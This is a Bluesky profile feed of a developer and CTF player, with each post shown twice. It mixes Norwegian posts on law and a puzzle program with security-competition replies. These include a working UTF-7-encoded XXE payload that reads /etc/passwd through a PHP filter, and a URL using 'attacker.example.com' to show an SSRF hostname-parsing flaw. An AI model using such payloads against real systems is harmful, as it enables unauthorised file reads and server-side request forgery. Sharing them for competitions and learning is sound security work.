martcl
@martcl.bsky.social
Developer, CTF player and golang enjoyer.
Gitt at dette er mulig, så er det ikke en god idé. Rettsstaten vil stagnere ved at det blir krevende å få inn nye endringer og endre status quo . typ ting som var ulovlig i 1972 som er lovlig nå. Vi trenger mennesker som hjelper mennesker her.
November 26, 2025 at 9:18 AM
Gitt at dette er mulig, så er det ikke en god idé. Rettsstaten vil stagnere ved at det blir krevende å få inn nye endringer og endre status quo . typ ting som var ulovlig i 1972 som er lovlig nå. Vi trenger mennesker som hjelper mennesker her.
NRK lanserte "Kula" og det ga meg inspirasjon til å se på dette problemet på nytt. Løsningen er en blanding av det beste fra mitt tidligere program, lærdom fra Tommy Odland’s løsning og en YouTube video om trekantsøk.
November 16, 2025 at 11:39 AM
NRK lanserte "Kula" og det ga meg inspirasjon til å se på dette problemet på nytt. Løsningen er en blanding av det beste fra mitt tidligere program, lærdom fra Tommy Odland’s løsning og en YouTube video om trekantsøk.
<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4
March 22, 2025 at 8:12 PM
<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4
Sorry if I'm interpenetrating wrong or ruining the competition. I really enjoined the article and learned something new! 👑 My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a blsky post!
March 22, 2025 at 8:12 PM
Sorry if I'm interpenetrating wrong or ruining the competition. I really enjoined the article and learned something new! 👑 My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a blsky post!
I interoperate the words "post your solution" and "reply" as it's OK to share a solution publicly before the competition is finished. Just feels a bit strange 😅
March 22, 2025 at 7:57 PM
I interoperate the words "post your solution" and "reply" as it's OK to share a solution publicly before the competition is finished. Just feels a bit strange 😅
With "reply", do you mean comment our solution here?
March 22, 2025 at 7:48 PM
With "reply", do you mean comment our solution here?
Better to just use the browser. No updates;)
March 11, 2025 at 6:59 PM
Better to just use the browser. No updates;)
… Depending on how the function is used, you would need to add one more colon to my original url to get a ssrf.
March 5, 2025 at 2:16 PM
… Depending on how the function is used, you would need to add one more colon to my original url to get a ssrf.
This is just url parsing. The vuln comes from how you use the function I guess. ssrf could definitely become an issue here since hostname assumption is wrong
March 5, 2025 at 2:12 PM
This is just url parsing. The vuln comes from how you use the function I guess. ssrf could definitely become an issue here since hostname assumption is wrong
regex <3 `https://example.com:pass@attacker.example.com`
March 4, 2025 at 10:28 PM
regex <3 `https://example.com:pass@attacker.example.com`